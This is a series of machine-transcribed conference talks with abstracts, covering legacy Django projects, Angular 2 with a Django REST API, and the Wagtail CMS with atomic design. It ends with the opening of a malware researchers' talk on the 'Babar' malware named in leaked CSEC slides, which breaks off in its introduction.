bridge, so to speak. And this tends to accompany most of what you were talking about, like with the test suite that is kind of present, but a lot of it fails. So, I don't know, just what are your comments on that? So, I think I was going to briefly explain what that didn't. I think one of the first things you do is just refactor the view. So before you're just taking that stuff out and putting it into a separate function or a separate method, that can be the first step. Rather than putting it into a manager or a model right away, I tend to use a lot of just topical functions. Yeah, so too. And this is where the logic wasn't in the manager. It should have been in different models or different apps. Gotcha. Manager. I've also used topical functions that managers reference. Yeah. Rather than, because I find those easier to test. So last question. Yeah, one short question. You mentioned refactoring. How should I explain my customers that refactoring is valuable? That's a really good question. Your customer could be a client, could be manager, your boss. I mean, it depends on the person. One of these, I like to use some of the physical examples and say it's basically like having a messy job site. You're going to have injuries. You need to be able to see what's going on. And it's really difficult to do that. You'd also just, I'm sure there's some stats out there. You say, look, I read it in this book. Just point to a book they're never going to read. But it's like 20% likelihood of errors. And then that's going to go on. You really have to focus. They're concerned about speed of delivery and bugs usually. And so you can say, look, this makes it really hard to work on this. We're spending a little time up front to do it. Customers are probably used to hearing that too. But saying, look, there's some bugs. And if you can point to issues that would have been easier to find, let's say, and better written code, then that can be kind of where you're starting point. I don't have a great answer for that. More sure. All right. So it's time for lunch, everyone. And real quick, there's, I have more. There's some Iowa Peppets stickers up front. And I have more if you want one. And I'll tweet out if you want a shirt. Bye.
|
Legacy software is software that already exists. It may be a project you've inherited after joining a team, a new client's application, or something you wrote last year, or last month. Most software developers seem to prefer "greenfield" development, where you get to start from a clean slate. The reality is that there's a lot of "brownfield" development out there, that it rarely makes sense to throw away working software, and we can control the experience quite a bit to make our lives, and the software, better. If you haven't worked with legacy software chances are pretty good you will. We'll first walk through what "legacy" means, and what this looks like specifically for Django developers and Django projects. We'll also cover some of the scenarios in which you may find yourself working with legacy codebases. This includes the types of issues you'll be presented with, both generally and specific to Django. What do we mean by legacy code? What does a legacy Django project look like? What kinds of issues will you need to deal with? How to approach the codebase Tools for working with your new legacy codebase Introducing or fixing tests Common issues to look for and how to solve them Legacy deployment processes and other scary nightmares More features! Balancing business needs and "perfect" code Deciding when to upgrade Django and other dependency versions, and how to do this
|
10.5446/32731 (DOI)
|
Come on, y'all! MUSIC Thank you for the warm welcome. It's nice to be at DjangoCon. I'm Pam Felly. You can find me on the internet at Pamisor. And my also dinosaur related blog, thewebevore.com. I am Philadelphia. I'm also a Google developer expert in web technology. Currently a software engineering lead at IOPype. So let's talk about what's going on with Angular 2. Let's just get right into it. So if you... I'm going to presume that you've heard of Angular as a major web framework. And what we're going to be talking about today is Angular 2, which is the next awesome version of Angular. If you want to find more about it, it's at angular.io. And it's quite different than Angular 1. So we're going to talk about that today. So the path from Angular 1 to 2, it was blogged about in 2014, in March, with some stated goals to be more modular, to support the newest versions of JavaScript at the time it was turned at CommaScript 6. Simplified dependency injection, make templating easier, simplified directives, which have been a point of confusion in the Angular world. And the beta for Angular 2 was released in December 2015. Now, looking back on that now, feels like not that long. It felt like a long time when watching that design contest. And especially with all the promise of how awesome Angular 2 is going to be, there was definitely a lot of anticipation about the framework. So what makes Angular 2 so special? So there's three things I'm going to talk about today with how Angular 2 is so special. And I'm also then after that, we're going to talk about how Angular 2 will play in a Django environment. So building for any deployment target. So this is really awesome. Angular 2 is not tied to the DOM. So the document object model is that APR we get to control the client. Angular 2 does not have a concept. It doesn't have to be tied to the concept of a DOM, whereas Angular 1 has this limitation. So if you want to use Angular 1 somewhere, that means that wherever you want to use it, it needs to understand some kind of document object model. Not so in Angular 2. That's actually really awesome because that means you can run it in places that don't have a browser. That aren't a browser environment. So anywhere you can bring web technology, which is actually in a lot of places, you can take Angular 2. So kind of the biggest example of this is being able to use native script, which is an open source, cross platform framework for deploying mobile apps. And you can use Angular 2 and native script so you could actually share code across your web and mobile apps. So that's pretty awesome. So Angular 2 is architected with components, which we'll talk about in a minute, makes code reuse really accessible, which is always a big dream in web development. So choose your own language. So whereas Angular 1 is a JavaScript framework, Angular 2 is kind of a, as long as it compiles a JavaScript framework, with especially a big focus on TypeScript. So this is actually the drop-down in the Angular docs. So you see you've got TypeScript for a JavaScript for Dart, which is a language champion by Google. But let's talk about TypeScript for a minute. So TypeScript is a project champion by Microsoft. It's a super set of JavaScript providing, among things, optional static typing, including, you know, I know, I have a conference, let's talk about types. Types are really awesome, really like those. So they're nice to have when you can get them. So you can, you get types with TypeScript totally optional. You don't have to annotate types. And if you do want to annotate, you can always punt and say any. But you can, then also with TypeScript, compile the newest JavaScript standards to older environments, which means you get features like modules, lambas, classes, the spread operator, for of stuff like that, in that's in the newer versions of JavaScript, and the TypeScript compiler does all the work for you to compile that to run in another environment. So that you can just focus on writing beautiful TypeScript code and not on whether the browser you're going to deploy to supports it. And the other thing is that part of the design of TypeScript is that JavaScript ES5 is valid TypeScript code. So it kind of follows the, you know, if you're familiar with SAS, it kind of follows that model of all you do is change the end of the file and goes from JS to TS, and ta-da, it's a TypeScript file. And then that way you can migrate gradually to TypeScript if you so choose, if you're in a migration type situation. So the big question is always do I have to use TypeScript to use Angular 2? And well, no. But if you saw the drop-down, you saw that there's multiple options, it's also like if you wanted to write something that, you know, as long as it can interface with JavaScript, it could probably interface with Angular 2, then, you know, use what you want. But it's pretty awesome to use TypeScript, it's pretty fun. It also allows documentation for Angular 2, the best documentation is in TypeScript, so even though they have the other options, the best documentation is in TypeScript. So it doesn't make a lot of sense. There's good IDE support if you use an IDE or even SublineTax. Great TypeScript support. All right, let's talk about web components. So before I talk about Angular 2, I'm going to talk about what web components are just for a quick review. So a web component consists of three parts. So you have markup, behavior, and presentation. Together, they form a beautiful package of a web component. So let me introduce you to a web component that you're probably familiar with. Oh, no, let's just get past. All right, so this is a select tag. It has markup, it has presentation, and it has an API. So you know how to get the value out of select tag. So where does select tag exist? Right, and every time you wanted to do something like a select tag, you had to write a separate HTML file, write a separate JavaScript file, and wire them all together, and then there's a million plugins for it. You can think of components like this, like we do this all the time, like carousels, or menus, stuff like that. And so the idea with web components is you don't have to champion these things to become native, like this web tag, which is native. You can write your own web component and then share it with all your friends, and have lots of fun. Web components are really awesome. They're definitely the direction the web is going in. And in fact, the idea of web components actually refers to a set of APIs, and these are the APIs it refers to. So you've got custom elements, HTML imports, templates, and the Shadow DOM. So many of these might sound familiar, some of them might be new. But the thing that's interesting, slash not so fun about them, is that browser support is not across the board. So that means that in order to use the web components API, you either need to get a polyfill, or you need to, you know, you probably want a polyfill, and then you want to use something on top of that polyfill, like Polymer or X tag. However, these polyfills, they aren't super performant. So the direction is web components, so basically the direction is web components, but should you use web components right now? Probably not. You should be aware of them. So this is where we get to Angular 2. So one of your best bets for using something like web components is using something like Angular 2, which has a component, you know, it has the idea of components, and then it actually plans for them to be compatible future forward with the web component specification. So that's pretty awesome. So you can just use something that actually works, and that's really performant, because that was a priority in Angular 2. Remember, we want to be super performant, super fast. But you get, you know, you get to, you know, be aware of this new thing coming forward. If you want to learn more about web components, this is definitely the place to learn about web components, webcomponents.org, kind of like the homepage for all things web components. So let's talk about components in Angular 2 and what they look like. So here's a TypeScript web component. So if you're writing vanilla JavaScript much, and you haven't written TypeScript, it looks a little weird. However, it looks pretty similar to ES6 or ES0.15 type stuff. You've got a class keyword in there. You have a component there. In Angular, it's considered an annotation, but you can probably think of it like a decorator. So it adds metadata about the code, is what it does. And so our component annotation says we want to target a particular selector. Say hello, and we're going to do some data binding. You can see a Type annotation there. That name is a string. And so this is a super simple hello world component. You write the same thing at ES5, and it looks like this, which isn't so different. It's just, it's using the same DSL, so the same domain-specific language, which is nice. So once you know the Angular 2 way of doing things, you can kind of bounce between them if you want to. And so on. So no type annotations. It's just, you know, plain old JavaScript functions, plain old JavaScript objects. Let's talk about directives. So in Angular 1, you did a lot of things with directive. It felt like if you ever developed an Angular 1 project, to me it felt like if there was a question, the answer was a directive. Like much of the time. If it wasn't related to fetching data, then that's a service. But if you want to modify presentation, if you want to, you know, create a new element, it's also a directive. So everything is a directive, basically. And so, what was a directive anyway? So in Angular 2, this is a directive in action. So, in GIF, it looks a little different in Angular 2. You have a little asterisk there, which is actually a nice way of showing you that the directive is going to change what is going to be outputted in the presentation. So, in GIF is going to do, it also helps Angular 2 break out the code when it's doing its parsing. So it actually does serve a really nice purpose for them, too. But in GIF, it's true, then it will display this link, if it's false, it won't display the link. Pretty straightforward. But so that's the directive. It's a thing that you're going to put on your HTML to modify what's going to happen in your application. So you keep directive, so we just saw a directive in Angular 2, but they go in components. So, I really, this is probably my favorite thing about Angular 2, is that if you are not familiar with Angular 1 and you're coming here, I would say just go forth into the land of Angular 2 and don't confuse yourself in Angular 1, because it's quite different. And to me, wrapping my head around components, which are markup, behavior, and presentation, is a lot easier than trying to figure out what a directive is. So you can keep directive, which are annotations on your HTML, but they go in components. So here's an example of a component with a directive, which is something super important, which checks it. That's July 2016. And if so, it will say hello, DjangoCon. Oh, I will. Back in the book. Back in the book. All right. Anyway, I was going to try and scroll it right, but you can believe me that it says 2016. And we'll also see it in the example app, so it does say hello, DjangoCon. All right. Well, I think I'm going to talk about Angular and Django now. So, you know, giving an Angular talk at a Django conference, but it's also, you're talking about web technology in general. So, beauty is Django and certain things in the Django ecosystem make it really easy to write your API once, used everywhere. So, you write an API, you consume it in this app, consume it in that app, you know, say API is what it's for. So, you can write your API in Django and then consume it with your Angular 2 app. That's probably the best way to use Angular 2 in the Django ecosystem. I would not recommend doing something like a, like, Franken, you know, serve some things with the, you know, from a server, serve some things with Angular. You kind of want to go in one direction or the other. If you want to do some service rendering, that's a different thing too. But that's also a different talk. So, if you're going to write an API, the kind of common ways to do this in the Django world would be with the Django Restring where, do some of you go to the Django Rest tutorial? Yeah. Nice. It's a really cool framework. So, I'll, like, show it and then the rest of you will be like, why not go to the tutorial? And then TastyPie, which makes it really easy to make APIs. So, Django Rest, powerful and flexible, WebBrasil API, other awesomeness, go to a Django Rest tutorial and learn all about it. So, let's actually look at that. I believe it's time for that now. Yeah. So, our API is Dinosaur's as a service, which is a super important service the world needs today. If you want to talk about funding, you can talk to me afterward. So, let's look at that API. So, to get this started, I mean, I did the bigger, sure. Thank you. Yeah. So, this UI is pretty much all, well, it's all from Django Rest. Like, I did the configuring and stuff. I made a model, put some data in the model, did the Django thing. But most of it is this beautiful UI, it's browsable, it's all the Django Rest framework. So, if I click on my dinosaur at that point, which is cool that I can click on it, that's really awesome. So, I see my dinosaurs. I want to ask you to suggest a dinosaur, but you have to suggest one that I can spell. No. Okay. How cool is that? Like, we just like, it just does this. It's Django Rest, it just works. Love it. So, we just add in T-Rex, if we go back and we look at our dinosaurs, we have T-Rex. So, this is running on localhost 8000, and then I have our Angular 2 running up here. So, you see, we actually have the DjangoCon that directive is running and saying, yes, it's July 2016. So, it's DjangoCon. And we see our dinosaurs listed out here. So, it's interacting with the API to present this to our, you know, our simple application. And all this code is available online if you want to see the example later. So, don't you need to refresh the C-T-Rex? Or is that a different thing? Good question. Oh, so if I had made a code change, yeah, if I made a code, so I have it set up with live reloads, if I made, the question was, do I need to refresh the C-T-Rex? Yes. But, let's see. Yes, there would be ways for you to not have to. You could set up, especially an awesome thing about Angular 2, which I didn't put in here, but it's generally awesome, is that the way you get your data by default is through observables and not promises. So, a promise in JavaScript is like, go and get me some data, and then like, let me know when you're done, and then here's some data. And observable is more like, go get me some data, and then give me data as you have it. And that's pretty awesome. So, if we actually set up a, you know, we could set up a web socket, something like that, and send an event, and like, there's a bunch of ways we could do that in order to get a, get the T-Rex once it was added live. So, here's some of the Angular 2 code, and this is all going to be in TypeScript, and the example code is in TypeScript. But so, this is a big wall of text, so less instead, look at a little bit less of it. So, this is the important bit of the, the getDinos service. So, the services we are in Angular 2 are going to be, if you have a data source, and you want to tap the data source to speak, you're going to use a service. It makes sense, because actually, go with it. Or it will eventually. So, you have a service, and then you have a little getDinos method, and it uses the HTTP service to get this API. This actually turns it into a promise, and just uses promises to keep things more promise-like, and not observable. And then it just throws the data at the browser. So, it says, there's a component that's consuming the service. But, you're going to run into this problem, and that is core, so across origin requests. But, it's not that bad, because we're working in Django, and so there's a Django package, which, you know, you install it, you add it to the middleware, and, ta-da, you have a core's policy. It's pretty awesome. So, one of those nice benefits is being able to build your API quickly in Django, you know, run into a little problem, there's a Django package to fix your problem. What's that for JavaScript? So, let's look at the dinosaur component. So, if our service is where we're going to get our data, right, then our component is going to be the thing that's actually going to display on the page. So, it has the, you know, to beat it to death, the presentation, the markup behavior. So, this is an annotation that is on our dinosaur component, so it sends dinosaurs, and then there's a little template, and you'll notice that the template has a directive, an ng4, and it just says, let dino of dinos, where dinos is that set of dinosaurs, we get as a response from the API, and then it just displays a speech use in an unordered list. And this is the rest of the component, this is the JavaScript part, so those are both in the same file, but just broken out to make it a little bit easier to read. And so, we've got, it implements on init because when we want, when the component boots, we want it to make a reply store service. And so, when it init, we say we want you to go get dinos. And since dinos returns a promise, we get to use lan and catch and set our dinos, which, for it's see, this is the type system that's like hunting, and made dinos a type of any, it could, it's an array of objects. An error is any. So, yeah, so this is the bit in the dinosaur component where this is dependency injection in action, which is pretty nice. So, it's, instead of saying dinosaur service equals new dinosaur service, which would be one JavaScript way of saying this, dependency injection says, in the constructor, we're passing private dinosaur service, which is a dinosaur service. So, in the type annotation, this kind of makes sense. So, we're getting dinosaur service because we, the big, the capital dinosaur service is what we brought in. And then, lowercase dinosaur service is what we're actually using in our component. And then, on init is that boot process where we get dinos on the component's initialization. There's also component tear down, in case, there's a hook for that, in case you need to tear down components when they're destroyed. So, the example app is at Django REST Angular 2 example. I'll tweet it so that you don't have to memorize it. And all these slides are available at pcelli.cdhub.io slash Angular 2 and you. So, thank you very much. If you want to get in touch with me, Pamisor, the web before, I also have a podcast with some friends called Turing Incomplete. If you get the joke, you'll like the podcast. And thank you so much. Thank you. So, this is the system.js. So, that's just what I use. So, it consumes these things. And the system.js can fig. One of the reasons why is if you look at the system.js. So, this is index. But then, system.js config looks like this. So, that's kind of gnarly. So, I kind of let them handle that. And then, it works. So. Yeah.
|
AngularJS is one of, if not the, most popular JavaScript framework out there today. But a new day is coming: The dawn of Angular 2! Angular comes with a robust community and standard of practice, but Angular 2 is something even more intriguing: a JavaScript framework based on components (not unlike React!), with an eye towards complying with future web standards. In this talk, we’ll cover the broad strokes of Angular 2, including some of the big game changers: web components and “choose your own language” support, and how it integrates into back-ends like Django to provide some structure to your front-end. You'll learn about Angular 2's approach to the "JavaScript framework" problem, how components create modularity in your application, and a little bit about the JavaScript build toolchain (mysterious to many!) that the JavaScript world is constantly debating over.
|
10.5446/32732 (DOI)
|
Come on, y'all! MUSIC Thanks for coming to listen to me talk and, you know, stick with us for the end of all the talks. And thanks to Torchbox for making WaxHell. It's a wonderful piece of technology. And it's the reason why I'm standing here. So, show of hands, who knows what WaxHell is? Other than what Vincent just said. OK, that's great. That's actually a lot more than I thought it would be. So for those of you that don't know, WaxHell is a pretty new open source Django CMS, created by Torchbox. And it basically provides this sort of groundwork to build your own CMS. And that's in quotes because it gives you a lot of things that you would expect from a regular CMS. Things like a great admin or the ability to have a publishing system, really anything like a way to manage documents, images, things like that. But I like to think of WaxHell as something that's made for the developer, the designer, and the content editor. There's a lot of CMSs out there that really only focus on the either like the development side or on like the editing side, but I find that WaxHell does a really good job of combining all of these great components that really should be relevant in the CMS. So why should you use it? It's really customizable. I've extended the framework, well, the CMS on numerous occasions, doing weird things. And it's really like, held fast. It's really not a big deal to really extend even some of the most crucial components. In fact, my last projects, I had extended the publishing workflow to add a staging site. So normally you'd have a draft state and then it's published. I've added a staging site to that entire workflow. And that didn't interrupt anything about the other components of WaxHell. There wasn't any weird things I needed to take care of. It was really easy in that way. And it's got some really great features. Unfortunately, I can't talk about all of them or even most of them. Actually, there was another at this conference that talked about Django forms in which you kind of think about forms as data and in which you can build them dynamically instead of static way as we would normally. And WaxHell does kind of use some of this. And that's just kind of part of what WaxHell offers. So I can go into it, but there's a lot of great things that WaxHell offers. And it gets out of your way. Everybody always likes to talk about how developers are lazy, right? We want everything done for us. We don't want to do anything. We just want to write import essay. We don't want to write the thing. We just want to be able to use it. And I think that WaxHell has this, I think I've added a caveat. I think WaxHell does this as well, where it gets out of your way, but then it provides all these features that you'd like. So yeah, we're lazy. We want to be lazy. We don't want to do anything. But we also want it to provide us with the things that we want to do. So we want it to get out of our way and just let us do what we want to do, but also provide the features that we want. It's also got JINJA 2 compatible templating as well as Django. Normally you'd probably use Django, unless you had some sort of reason. It's got built-in last-discret integration. So there's a bit of setup that you have to do to achieve a really good workflow or really good search capabilities with this, but it's really not much. And if you've never heard of or used a license search, I definitely recommend it. It's a really great search engine. Well, it's more than that, but it's easy to integrate in existing projects. It's not really something that works on top of Django and more about beside it. So you put it in your installed apps and you're able to create your own sort of CMS. And I'll explain how you can create ways to create content types later. And it's not going to interfere with any of your other Django apps. And you could really only have a blog that's powered by Wagtail. You don't have to have a one project that has to be powered by Wagtail. It's not like that at all. And it lets Django be Django. And this is like a really important thing. And I think in the mezzanine talk that he had mentioned this too, and I think I haven't had so much experience with mezzanine, but I found that Wagtail does this very well. So some caveats to how great this, you know, how great Wagtail is. It's not exactly your normal Django flow in terms of how you, which is a bit contradictory, I realize, in the way that you think about how things get served, right? So you think of the way that a request comes in, it goes through the normal path, and you end up this views.py where you're returning this result. And I don't know if this is a bad thing or a good thing. I think it's pretty good where they have this generic view function in which it calls the class in which you created to render as the web page. And it gets the context and packages all up. And then through that generic serve function, that view function, it will give you that web page. So you don't have to do anything. You could have an entire Django or you could have an entire Wagtail project, entire site, without ever touching these up-pies. And also the documentation is pretty good, but it could be a lot better. I found myself coming across things, or at least when I started it, that were fairly easy to understand, but I didn't know, and it took a long time to actually get to that understanding, just because it wasn't in documentation. And then there are a couple admin quirks, but I hear really good things about them being up-to-date. So let's just talk about some features real quick. So the page model, which is basically the bread and butter of how this is going to work. And like I said before, it's got this built-in publishing workflow. And I guess I should back up a little bit. Page model, it is a Django model. They add a bunch of really awesome functionality to it. And then when you want to create your content type, it is something that you would inherit from Page, which you can see in code. It handles all the relationships between different pages. So is it like a child page of a parent page, or you can get the children on this page? You can get the ancestors or the descendants. It's a really useful feature. And that's actually something they achieve through a different package called TreeBeard. I don't really know what the relation is with that, but you can look into that on your own. So it handles other things like moving the relationship from one parent page to the other, copying the page, scheduling, publishing, so you're not having your content editors wake up at midnight just to publish some press release. And it's got automatic waxel admin registration. And I just want to underline waxel admin because it's not something that you're automatically registering in your Django admin. But anyway, so this is like an example of all you need to create a page type, a content type that you could add to your site and visit as a web page. So you go in your models.py or wherever you're going to put this model, inherit from Page, and then you can add even a Django model field, a date field, and then their own built-in rich text field, which is really just a WYSIWYG editor. And then in order to show these in the actual view that you're going to see, you're just going to declare these content panels, which is just a list of these field panels. And it will go in and detect what type of field that you're using and then render that appropriately. So Streetfield is really the big win. In my opinion, I think this was the thing that most attracted me to Wattville. And it's, to me, just to explain, I don't work for Torchbox, by the way. I just really love Streetfield. I really like Wagtail. And I think it's creative, intuitive, everything I say up there. And Matthew Westcott has written a really cool blog post that kind of parks on this or comes off of this theme of the Henry Forte saying, I think I'm paraphrasing the analysis exact quote, but he says something like, if I ask them what they wanted, they'd say faster horses. And now we've got cars. So this is the type of thing that we're talking about when I say rich text field or was he with replacement? Instead of this blog of HTML, we're working with JSON. And in order to create these JSON objects, we're going to be implementing these things called blocks, which is a class that manages all this data that creates it in the, just creates like this nice structured block of content within this Streetfield. And Streetfield, if it's a little bit confusing and I'll dive more into it, it is really just a text field saving the database. So instead of, again, this like completely, like it could be completely unknown to what's in this blob of HTML. Now we know exactly how to access all of these individual components because it's all formatted JSON. And so this would be an example of a block, which I referred to earlier, something that could manage that JSON content. And really, we're inheriting from a couple of things, but really to understand is that blocks.struct block, which is what we're inheriting from here, is just a way to combine different blocks, right? And a block you can think of as kind of like a field, like a model field, even though it's not something that's actually getting directly saved to the database. The only thing that's saved to the database is that text field when you're declaring Streetfield. And you can see that we've done other things here too, like in the meta class, we've done things like icon equals Wagtail and Semplin equals example block.html. And that's how it's going to be used, or that's how you're going to see it in the admin. That's how it's going to be rendered in the front. And we'll explain more about that. So on the actual page, this is what Streetfield is going to look like. You've got your Streetfield, which again is just that text field, just formatted JSON. And you pass in an argument of a list of tuples. And each tuple has the string, which is the type of block that you're working with, and then the actual block class in which is going to be manipulating that data. And so in order to really demonstrate it, and I know I might be harping on it too much, but it took me a while to understand this. My password is foobar, so. So here, this is the Wagtail admin. And you can already kind of tell that this is something that's derivative from other CMSs that you've seen. But to me, it looks a lot better. It looks a lot more streamlined. And here are some other features that I couldn't talk about, the things like images, documents. This is where you could go and look and search for these things. Here's a search for all the different pages and content types that you want. SNP is a really just models that you can register in the admin. And then we've got settings. So we've got really good controls for adding users, adding groups of users, getting permissions on those groups, and setting up redirects and different cool stuff like that. And then what's really nice and something that people use all the time really is this Explorer where it actually has a page that doesn't have anything in this. And by the way, this is a Wagtail demo from their, this is their demo. I haven't made any of this code at all. Nothing is actually mapping to anything that I'm showing you in code on the presentation. So because I kind of wanted to show everybody that that does exist, so we can go to this root page and then we can go to this atomic Wagtail page that I've created. And we can see that I already have content here, but this is the stream field and this is what's going to look like in the admin. And so you can tell that we've got how these icons, like how the icon made up like attribute comes in. That's the, I think it's like heading icon. And we've got all these different blocks that we can, block types that we can select, right? And this is great, right? Like this is exactly something that we want. You know, we want to be able to have a heading here and then just say heading. Why do I always do that? Heading and then we can have like even rich text field. And you know, sometimes that's, sometimes that's appropriate because sometimes we want to put in a link or something like that. I'm not going to put in the link. Sorry. And then we can also do things like preview the page and then this content shows up. And you might be wondering and I'll explain a little later why, why it didn't just show up as just text, right? Because, and it's really because of that template, but I'll explain a little bit more right here actually. So stream field, you can think about this and if we, if we kind of know that stream field exists on that page model as a, as a, as a, just a JSON formatted text, we can think of each one of these blocks as different types and C is before B is before A. So every time you're going to be rendering each JSON object, it's, it's, it's in an order, right? And these things are horrible too. So you can actually move the different blocks if you want. So let's just say C is a person block that has a name, a date of birth and a biography. Biography could just be something like a rich text block, but, but instead maybe we want to do something else too. We want to put in a heading and then the body is, is the rich text block and then we add an image for that person's like a headshot or something like that. And really this was just a really simplified page, but what, what is really important here is just this. You're just accessing each block as a collection on this page dot body, which is a stream field and then just rendering that block, right? And what's, what, and really that's, that's all you really need and sure you can do really custom things like accessing the block dot block type, which will give you that string that you gave as an argument in the beginning in that tuple. So you can render it in a certain way given certain conditions or whatever you want to do. And so what's really happening here is that this person block made up of all these different other blocks is calling this render method and this is somewhat of an oversimplification here and this isn't exactly code that you might use, but then you have this person dot HTML template that you're declaring in that block class. So, so once it gets to value dot biography, it will then call biographies render value, right? Or render function, which will do the same exact thing. So what's really great here is that you're able to actually modularize all the entirety of your content instead of just having this big blob of HTML. So just to step back, do something else for a little bit. What's what does anybody actually ever combine documentation or have some sort of workflow with their designers in which they're actually mapping their designs on the website that you're building for them with back end code. Nobody, nobody does that. Okay, cool. So a topic design was thought of by Brad Frost and this link I'm pretty sure is to the article that he wrote on this. It's a whole book. It's an ebook you can download, you can buy, you can just read it online. But essentially it's just a philosophy or just a way of thinking about how we can combine different modules and design on your site into really consumable pieces. And so I'm going to go over this really quick. I'm not a designer. I'm just trying to, you know, explain how we can integrate this. So really five levels, atoms, molecules, organisms, templates and pages. I realized that this isn't exactly a great analogy with, you know, biology and then templates and pages. But this is kind of how they've created that. And so an atom would be something simple, something like a button or maybe even just a headed. And then molecules are like a combination of atoms. Organisms are a combination of maybe molecules, maybe multiple molecules, maybe molecules and then atoms. However you want to define that within your own reasoning, sort of like guideline by Brad Frost's atomic design. And then templates would be just everything together. You can think of it as just your jango template or something and then page is something that you have all the content. So that's just a really brief overview, really oversimplification or really oversimplified version of what atomic design is. So when you're using waxel with atomic design, which is something that I've been working with for the past like year, is you're going to map all of these blocks, these stream field blocks that I've told you about to your atoms, your molecules, your organisms. And then you're going to combine them in your page type to be able to render all of your different components consistently. So your design is continuously pervasive through everything that you're going to be developing with. So this is like an example of atoms.pi where you have your heading and it just inherits from char block. It uses the title icon and then it uses the template atoms heading to as you know, and it could be something as simple as just using that H1 tab or it could have extra classes that you want to put on there. It just all depends on your use case. And then we have same thing for hyperlink. That may be a little bit more complicated because you could have different markup for external links or whatnot. And then we just do the same thing with molecules. But again, since all atoms can be inside molecules and so on and so forth, we're going to just reuse these components. So every time you use a heading, you're going to, where every time you want to put a heading somewhere, you're going to reuse that in your molecules. And so like you don't have to worry about multiple changes or like anything like that, like in random here in this page, we have this blob of HTML where we have to change this H1. And oh wait, we have to go over here and change this H1. It's all going to be changed right there. It's all just rendered exactly the way you want it. And it's also only going to be rendered on whenever that, on runtime. So that even if it's the same heading content, you're still going to get that change whenever you want to make that. And so we do the same thing with organisms. We have seen this before. And then we have a stream field where we combine all of this together. And so again, we've got this really continuous, this pervasive design specification in our code. And not only just that consistency, but we also have a mapping between our designs where they have tons of documentation because designers love documenting and they love understanding exactly how these components interact with each other or just have these different actions. And then we can say like, oh, that's the exact component in the back end that does that. And that's something I've never seen before. So this is like a really cool way to actually organize all these things. And it makes ramp up time for like new fellows or like new whoever to be able to understand like which maps to what. And so this is just some sort of, you know, projects, file structure setup that I did. And essentially what my project is like is I put these in this elements folder. I put all of my add-ins molecules organisms. And then in my models down here, I'm going to be putting all my page types. And actually in my project, I have a models folder in which I have all the different pages that I've created in that folder. So a couple more thoughts. You know, Waxel is really cool. It has that awesome stream field feature of many other features. And it's something that I've always heard from other people like content editors, really anybody that it's just such a joy to use. It's a great replacement for something that is really unusable, like not really intuitive. We replaced it with work or we replaced WordPress with Waxel. And our content editors were just, you know, jumping with joy almost. I mean, they were really, really excited about it. And if you go to madewithwaxel.org, you can see all the different websites that Waxel's like. That's Waxel's powering. There's I think there's parts of like NASA. There's consumerfinance.gov, which is the CFPB site. There's Peace Corps. So it's not just some, you know, brand new. No one's ever used a technology. This is actually pretty proven. So I definitely encourage you to go and at least try it out. See what these features are like and see if maybe, you know, you can incorporate its own design in your workflow. So that's it. Thanks. Oh, thank you, good. We've got a few minutes for questions. So my question concerns image versioning and multimedia asset versioning. Is there any facility to version images and assets so that they can be sort of updated on their own, affecting all pages? That's actually an interesting question. I don't think I know enough about exactly how these images are being, you know, like essentially each image itself or document or whatever has its own ID and a database. So if you update that ID, it's going to be changed throughout the whole thing. I don't know about versioning. That's, there is such a thing in Waxel, which is actually one of the greatest things about it that I'm sorry I didn't even mention is really just the versioning of the pages. So every time you save data on that or every time you save a page that gets saved as a revision object. So you can reference that object. That isn't something that images have. I don't know if that entirely answers your question. It does. Okay. And I have another question, but I'm going to defer and ask it later. Okay. Thank you. I think we've got time for one more question. Yeah, so my question is basically concerning like say you have an existing site that has user profile, you know, like a user profile page or something like that. And so I guess this is around integration. So and you want to integrate Wagtail into the site. Is it possible and if so how hard is it would it be to basically make it so that the Wagtail articles say you're one of them's an author or something you would show that user profile information from an existing site. You know, does it integrate well with models that exist already? Yeah, it already uses that whole models table and everything. So that's going to automatically get there. When you go into the Waxel admin, you go to the users and it's just going to be there. Okay. That's my experience. You know, they're, yeah. Okay. And how does the code actually like hook up, you know, so like say you've got, you know, does it just use to get absolute URL, for instance, if it links to their profile or is it just as you customize yourself. You know, in terms of I'm sorry, I don't think my answer is entirely correct about user profile. I don't know about that. Okay. I think the users themselves are going to be connected. I'm not, I haven't had experience with connecting the user profiles. Okay. Sorry about that. Oh, no problem. Yeah. Thank you. All right. That's the one last quick point to make. First of all, thank you Kurt for your amazing talk. Thank you so much. Of course, can you live. Yes, I can.
|
WHAT IS WAGTAIL Wagtail is a Django-based CMS made by developers that were just sick of the current solutions out there for reasons from usability to extensibility. It provides a sleek and intuitive editing experience, while keeping its design open and flexible for creating custom frameworks. I'll first explain what Wagtail is, how we can use it, what features make it great, and what makes it not so great. ATOMIC DESIGN Brad Frost coined this term in reference to his taxonomical design model. The model breaks down design layouts from the simplest element to the more complex layouts. I'll briefly go over what this model is. ATOMIC WAGTAIL Atomic design lends well to the strengths and some features of Wagtail. I'll tell you how you can use Atomic design in harmony with Wagtail, with tips and pitfalls you might encounter along the way. LESSONS LEARNED Any new approach to something is going to be both fun and frustrating. I'll list some of the most frustrating aspects of Wagtail, trickled with some advice.
|
10.5446/32803 (DOI)
|
So, hello everyone. Good morning. Thanks for being here. My name is Jean Calvé. I'm a malware researcher working at ESET and I'm here on stage with Paul Rascaniere, writing Pink. I don't know why, but I'm a malware researcher at GData, a German antivirus company. Hello. My name is Marianne. Paul's name is Pink because I don't like pink. I'm a malware researcher at Cyphert, which is a US company. I'm working there as a threat researcher. And today we're going to present you our topic, Totally Spice. Yep. So this whole story basically started a few months ago, actually last year, because of this. You may have already seen this slide. It's part of a presentation that was leaked by Edwa Snowden in 2014. It was first mentioned by the French newspaper Le Monde in March 2014. And so basically, as you can see, these slides were made by the communication security establishment of Canada, the CSEC, which is the NSA in Canada, basically. And so they describe on the slides what they call the Operation Snow Globe. And that's the description of a group of attackers that they have seen in the wild and that they have tried to track, basically. So they describe the group and one of the striking information inside the slides is on this slide where they basically assess with moderate certainty that this Operation Snow Globe has been put forth by a French intelligence agency. And they actually provide very few technical details, but there are a few of them. And that's on this slide, basically, where they describe one malware used by the group behind Operation Snow Globe, which is called by the developers, apparently, BABAR, and they also have a developer username, probably from the debug path. And that's basically where we decided to let the hand begin. Awesome. So I'm not sure if many of you know this picture, or the picture of these three girls. That's a, I think a children's cartoon named Tolly Spice. These are the three Spice. You can imagine these are our characters today telling you about Tolly Spice malware. Again, this was not my idea. This was Paul's idea. Just to mention that, because he's the only one of the three of us who has little children. Anyway, all right, let the hand begin. So how did the hand begin? Like, as you know, every good article about APT malware starts with a timeline. Because apparently that's the most important thing when talking about malware. Anyway, so our timeline is going to be, we're going to show you the different families we found. The time on the timeline is when they were about, like, created or when we believed that they were compiled. And the order in which they appear 